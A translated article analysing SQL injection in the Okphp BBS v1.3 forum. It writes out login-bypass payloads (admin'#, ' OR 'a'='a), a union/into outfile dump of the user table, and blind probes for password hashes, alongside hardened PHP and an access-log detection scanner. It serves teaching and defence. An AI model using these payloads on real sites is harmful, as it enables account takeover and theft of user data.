PHP attack methods: PHP+MySQL injection statement construction

  • 2020-03-31 16:46:19
  • OfStack

I. Introduction:
Version information: Okphp BBS v1.3 open source version

Because of the nature of PHP and MySQL themselves, PHP+MySQL injection is harder than ASP injection, and constructing the injection statement is especially difficult. This article takes a brief look at a few files of Okphp BBS v1.3 to talk about PHP+MySQL injection statement construction; I hope it is of some help to you.
Note: none of the "vulnerabilities" mentioned in this article have been tested and they may not exist. In fact, whether they exist or not is not important; what matters is the analysis approach and the statement construction.
II. "Vulnerability" analysis:
1. admin/login.php injection causing an authentication bypass vulnerability:
Code:

  $conn=sql_connect($dbhost, $dbuser, $dbpswd, $dbname);
  $password = md5($password);
  // $username and the hashed $password are interpolated straight into the query
  $q = "select id,group_id from $user_table where username='$username' and password='$password'";
  $res = sql_query($q,$conn);
  $row = sql_fetch_row($res);

In the statement $q = "select id,group_id from $user_table where username='$username' and password='$password'", $username and $password are unfiltered and easily bypassed.

Select * from $user_table where username='$username' and password='$password'
Construct 1 (using logical operators): $username=' OR 'a'='a and $password=' OR 'a'='a
The equivalent SQL statement is:
Select * from $user_table where username='' OR 'a'='a' and password='' OR 'a'='a'
Construct 2 (using the MySQL comment markers # or /* to comment out the $password clause): $username=admin'# (or admin'/*)
That is:
Select * from $user_table where username='admin'#' and password='$password'
which is equivalent to:
Select * from $user_table where username='admin'
In admin/login.php, $password in the $q statement is md5-hashed before the query, so it cannot be bypassed with construct 1. Here we use construct 2:
Select id,group_id from $user_table where username='admin'#' and password='$password'
which is equivalent to:
Select id,group_id from $user_table where username='admin'
This works as long as a user named admin exists. If you don't know the user name but only the corresponding id, construct it like this: $username=' OR id=1#
which is equivalent to:
Select id,group_id from $user_table where username='' OR id=1#' and password='$password' (everything after # is commented out)
Let's move on to the code:

  if ($row[0]) {
    // If not admin or super moderator
    if ($username != "admin" && !eregi("(^|&)3($|&)",$row[1])) {
      $login = 0;
    }
    else {
      $login = 1;
    }
  }
  // Fail to login---------------
  // $login is never initialised: if $row[0] is empty it keeps whatever value it already had
  if (!$login) {
    write_log("Moderator login","0","password wrong");
    echo " ";
    exit();
  }
  // Access ! -------------
  else {
    session_start();
    // ... (remainder of the file omitted)
  }

Finally the whole decision rests on a single $login variable, so we only need to submit $login=1 directly from the browser (IE) to bypass the check :).
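A hardened counterpart to the admin/login.php query above, as an added example (this is not Okphp's code): the username is bound as a parameter instead of being interpolated, $login starts out denied instead of relying on an uninitialised variable, and the admin/super-moderator group check mirrors the original eregi test. It assumes a mysqli connection built with mysqlnd (for get_result()); the function name admin_login is my own.

```php
<?php
// Added example, not Okphp's code: hardened version of the admin/login.php lookup.
// Assumes a mysqli connection $conn and the page's schema (username, group_id, password = md5 hash).
declare(strict_types=1);

function admin_login(mysqli $conn, string $user_table, string $username, string $password): bool
{
    // Start from "denied". The original left $login unset, so a request could supply it.
    $login = false;

    // A table name cannot be bound as a parameter, so only allow a plain identifier.
    if (!preg_match('/^[A-Za-z0-9_]+$/', $user_table)) {
        throw new InvalidArgumentException('bad table name');
    }

    // Prepared statement: the username travels as data, so quotes and # inside it are just characters.
    $stmt = $conn->prepare("SELECT id, group_id, password FROM `$user_table` WHERE username = ?");
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    if ($row === null) {
        return $login;
    }

    // md5 is kept only to match the page's schema; hash_equals gives a constant-time compare.
    // New code would store password_hash() output and check it with password_verify().
    if (!hash_equals((string)$row['password'], md5($password))) {
        return $login;
    }

    // Only admin or a member of group 3 (super moderator) may enter; group_id is an '&'-separated list,
    // which is what the original eregi("(^|&)3($|&)", ...) test was matching.
    $groups = explode('&', (string)$row['group_id']);
    if ($username === 'admin' || in_array('3', $groups, true)) {
        $login = true;
    }
    return $login;
}

// Usage in the login script (constructed): branch on the return value, never on a global.
// $login = admin_login($conn, $user_table, $_POST['username'] ?? '', $_POST['password'] ?? '');
// if (!$login) { exit(); }
```

Because the decision is the function's return value, a request carrying login=1 has nothing to overwrite, which closes the second half of vulnerability 1 as well.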
2. users/login.php injection causing an authentication bypass vulnerability:
Code:

  $md5password = md5($password);
  // $username is interpolated unfiltered; only the password is hashed
  $q = "select id,group_id,email from $user_table where username='$username' and password='$md5password'";
  $res = sql_query($q,$conn);
  $row = sql_fetch_row($res);

$username is unfiltered, so construct 2 applies here too: the and password='$md5password' clause can be commented out.

3. admin/log/list.php has an arbitrary log deletion vulnerability. PS: this one has nothing to do with PHP+MySQL injection.
The Okphp back end seems to have been written carelessly: all of its files can be accessed directly, without checking whether the administrator has logged in. Let's look at the list.php code:

  $arr = array("del_log","log_id","del_id");
  get_r($arr);   // pulls the named request parameters into variables
  //
  if ($del_log) {
    // ... omitted ...
    if ($log_id) {
      foreach ($log_id as $val) {
        $q = "delete from $log_table where id='$val'";
        $res = sql_query($q,$conn);
        if ($res) {
          $i++;
        }
      }
    }
    elseif ($del_id) {
      $q = "delete from $log_table where id='$del_id'";
      $res = sql_query($q,$conn);
    }
    $tpl->setVariable("message","$i log deleted ok!");
    $tpl->setVariable("action","index.php?action=list_log");
  }

The code simply uses get_r($arr) to pick up the submitted parameters; anyone who submits the corresponding $del_log, $log_id and $del_id gets the deletion performed.
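For list.php the two missing controls are an authorization check and typed ids. As an added example (not Okphp's code), the following guard refuses the request unless the session marks an administrator, and the submitted ids are reduced to positive integers before a prepared DELETE runs. The session key 'admin_login' and the helper names are assumptions of this example.

```php
<?php
// Added example, not Okphp's code: authorization guard and typed parameters for admin/log/list.php.
// Assumes the hardened admin login stores $_SESSION['admin_login'] = true (an assumed key, not Okphp's).
declare(strict_types=1);

// Stop the request unless an administrator session exists. The original file had no check at all.
function require_admin(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['admin_login'])) {
        http_response_code(403);
        exit('admin login required');
    }
}

// Accept log_id[] or del_id from the request and keep only distinct positive integers.
function log_ids_from_request(array $request): array
{
    $raw = [];
    if (isset($request['log_id']) && is_array($request['log_id'])) {
        $raw = $request['log_id'];
    } elseif (isset($request['del_id'])) {
        $raw = [$request['del_id']];
    }
    $ids = [];
    foreach ($raw as $v) {
        // ctype_digit rejects anything that is not a plain decimal string
        if ((is_int($v) || (is_string($v) && ctype_digit($v))) && (int)$v > 0) {
            $ids[(int)$v] = (int)$v;
        }
    }
    return array_values($ids);
}

// Delete the given ids with one prepared statement; returns the number of rows removed.
function delete_logs(mysqli $conn, string $log_table, array $ids): int
{
    if (!preg_match('/^[A-Za-z0-9_]+$/', $log_table)) {
        throw new InvalidArgumentException('bad table name');
    }
    $stmt = $conn->prepare("DELETE FROM `$log_table` WHERE id = ?");
    $deleted = 0;
    foreach ($ids as $id) {
        $stmt->bind_param('i', $id);
        $stmt->execute();
        $deleted += $stmt->affected_rows;
    }
    $stmt->close();
    return $deleted;
}

// Usage sketch (constructed), replacing the unguarded block in list.php:
// require_admin();
// if (!empty($_REQUEST['del_log'])) {
//     $n = delete_logs($conn, $log_table, log_ids_from_request($_REQUEST));
//     $tpl->setVariable("message", "$n log deleted ok!");
// }
```

The integer cast means the id reaches MySQL as a number regardless of what the request contained, and the counter $n is initialised by delete_logs() rather than inherited from the request like the original $i.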
4. Multiple files do not filter variables, resulting in SQL injection vulnerabilities.
The Okphp authors don't seem to like filtering :). Basically every variable used in a SQL statement is "naked", so I won't list all the files; look at the code for yourself. I'll say a little about them using fields\list_threads.php as an example.
Look at the code for list_threads.php:

  // $forum_id comes straight from the request into the query
  $q = "select name,belong_id,moderator,protect_view,type_class,theme_id,topic_num,faq_num,cream_num,recovery_num,post_num from $type_table where id='$forum_id'";
  $res = sql_query($q,$conn);
  $row = sql_fetch_row($res);

The variable $forum_id is not filtered. Because MySQL does not support subqueries, we use a union to build a joint query (requires MySQL 4.00 or above) to achieve cross-database operations. We construct it as follows:
Construct 1: SELECT * FROM table INTO OUTFILE '/path/file.txt' (MySQL must have file permissions; note the absolute path on Windows, such as c://path//file.txt). This writes the query result to file.txt, which we can then read via http://ip/path/file.txt. Applied to the above, we construct $forum_id like this:
$forum_id=' union select * from user_table into outfile '/path/file.txt'
which gives:
$q = "select name,belong_id,moderator,protect_view,type_class,theme_id,topic_num,faq_num,cream_num,recovery_num,post_num from $type_table where id='' union select * from user_table into outfile '/path/file.txt''";
The above approach is more demanding: you need the web path (typically obtained by submitting a wrong variable so that MySQL reports an error), and PHP's magic_quotes_gpc=on option prevents single quotes from being injected. With magic_quotes_gpc=on we can still bypass it:
Construct 2: just like an ASP cross-database query, use a union select construct directly and infer values from the differing results. This method gets past the single-quote problem (magic_quotes_gpc=on) and continues the injection, but this kind of injection is relatively difficult in PHP and depends on the specific code; refer to pinkeyes' article "PHP injection instances" for detailed statement construction. Here's an example of using "different return" injection against Okphp (see vulnerability 5).
5. admin/login.php and users/login.php allow the password hash of a specified user to be guessed by SQL statement construction. (Actually this is the same as vulnerabilities 1 and 2; it is taken out separately here mainly to explain the method of statement construction.)
The problem code is the same as in vulnerability 1.
Statement construction (PS: there is no need for union because the statement itself already operates on the user table):
$username=admin' AND LENGTH(password)=6#
The SQL statement becomes:
$q = "select id,group_id from $user_table where username='admin' AND LENGTH(password)=6#' AND password='$password'"
which is equivalent to:
$q = "select id,group_id from $user_table where username='admin' AND LENGTH(password)=6"
If LENGTH(password)=6 is true, the page returns normally; if not, MySQL reports an error.
So we can guess the admin user's password hash, for example with $username=admin' AND ord(substring(password,1,1))=57#
which guesses the ASCII value of the first character of the user's password hash, and so on.
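For the union/outfile constructs of section 4 and the length/ord probes of section 5, a defender's view is what these requests look like in the web server's access log. The following is an added example (not from the article) that URL-decodes the request line and flags the shapes described above; the log lines are constructed for the example and the pattern set is my own, not Okphp's.

```php
<?php
// Added example, not from the article: flag the injection shapes discussed above in access-log lines.
// Patterns are deliberately narrow to the constructs the article describes.
declare(strict_types=1);

const INJECTION_PATTERNS = [
    // "union select" / "union all select", also with /**/ in place of spaces
    'union_select'   => '/\bunion\b[\s\/\*]+(all[\s\/\*]+)?select\b/i',
    // "into outfile" / "into dumpfile"
    'into_outfile'   => '/\binto\s+(out|dump)file\b/i',
    // a quote followed later by # or /* at the end of the request; browsers never send a URL fragment,
    // so a trailing # in the request line is itself unusual
    'comment_cutoff' => '/\'[^\']*(#|\/\*)\s*$/',
    // LENGTH(...) probe from section 5
    'length_probe'   => '/\blength\s*\(/i',
    // ord(substring(...)) style character probe from section 5
    'char_probe'     => '/\b(ord|ascii)\s*\(\s*(substring|substr|mid)\s*\(/i',
];

// Returns the names of the patterns that match one combined-format log line (empty if none).
function classify_log_line(string $line): array
{
    // Pull the request target out of: "GET /path?query HTTP/1.0"
    if (!preg_match('/"(?:GET|POST)\s+(\S+)\s+HTTP/', $line, $m)) {
        return [];
    }
    $decoded = rawurldecode($m[1]);
    // Collapse whitespace so "LENGTH (password)" and "length(password)" are treated alike
    $decoded = preg_replace('/\s+/', ' ', $decoded);

    $hits = [];
    foreach (INJECTION_PATTERNS as $name => $re) {
        if (preg_match($re, $decoded)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Returns [line index => matched pattern names] for every line that triggered something.
function scan_log(array $lines): array
{
    $report = [];
    foreach ($lines as $i => $line) {
        $hits = classify_log_line($line);
        if ($hits !== []) {
            $report[$i] = $hits;
        }
    }
    return $report;
}

// Constructed sample lines (not real traffic): one normal request, then the section 4 and 5 shapes.
$sample_log = [
    '10.0.0.5 - - [31/Mar/2020:16:46:19 +0800] "GET /forums/list_threads.php?forum_id=12 HTTP/1.0" 200 5120',
    '10.0.0.7 - - [31/Mar/2020:16:47:02 +0800] "GET /forums/list_threads.php?forum_id=%27%20union%20select%20*%20from%20user_table%20into%20outfile%20%27/path/file.txt HTTP/1.0" 500 312',
    '10.0.0.7 - - [31/Mar/2020:16:48:10 +0800] "GET /admin/login.php?username=admin%27%20AND%20LENGTH(password)%3D6%23 HTTP/1.0" 200 880',
    '10.0.0.7 - - [31/Mar/2020:16:48:11 +0800] "GET /admin/login.php?username=admin%27%20and%20ord(substring(password,1,1))%3D57%23 HTTP/1.0" 200 880',
];

foreach (scan_log($sample_log) as $i => $hits) {
    echo "line $i: " . implode(', ', $hits) . PHP_EOL;
}
// Expected: line 1 -> union_select, into_outfile; line 2 -> comment_cutoff, length_probe;
//           line 3 -> comment_cutoff, char_probe; line 0 is not reported.
```

Decoding before matching matters because the quote, the space and the # all arrive percent-encoded; a rule applied to the raw line would miss every one of the sample requests. The boolean-style probes of section 5 also stand out as a burst of near-identical requests from one client that differ only in the compared value, which is worth a rate-based rule alongside the pattern match.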
